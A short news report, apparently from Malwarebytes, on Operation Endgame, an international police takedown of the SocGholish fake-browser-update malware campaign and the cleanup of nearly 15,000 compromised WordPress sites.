The Operation and Its Targets
A coordinated international law enforcement effort known as Operation Endgame has dealt a significant blow to the long running SocGholish malware campaign. This operation, involving Dutch police, the Royal Canadian Mounted Police, the FBI, German authorities, Europol, and Eurojust, resulted in the takedown of 106 servers and domains. Crucially, investigators cleaned 14,971 infected WordPress websites that were being used to funnel visitors toward malware.
SocGholish, also active since at least 2017, is a malware framework that compromises legitimate WordPress sites to display convincing fake browser update prompts. When a user clicks on one of these prompts, the malware installs a backdoor, granting attackers initial access often used to deploy ransomware. The operation has been linked to the Russian cybercriminal group Evil Corp.
Impact and Scope
Authorities discovered exposed login credentials for roughly 1.4 million WordPress sites during the investigation. They used legal hacking powers to remove backdoors and malware from the compromised websites, then notified site owners to update their software, change passwords, and enable multi factor authentication. The affected sites included everyday businesses like restaurants and car garages, potentially exposing local visitors to malware.
Operation Endgame is being described as the largest international operation against ransomware and cybercrime to date. This specific takedown breaks a key infection chain used by multiple ransomware groups, disrupting the link between thousands of ordinary websites and a sophisticated malware ecosystem. By reducing the pool of potential victims, law enforcement has increased the operational costs for the criminal group behind SocGholish.
Source: Malwarebytes
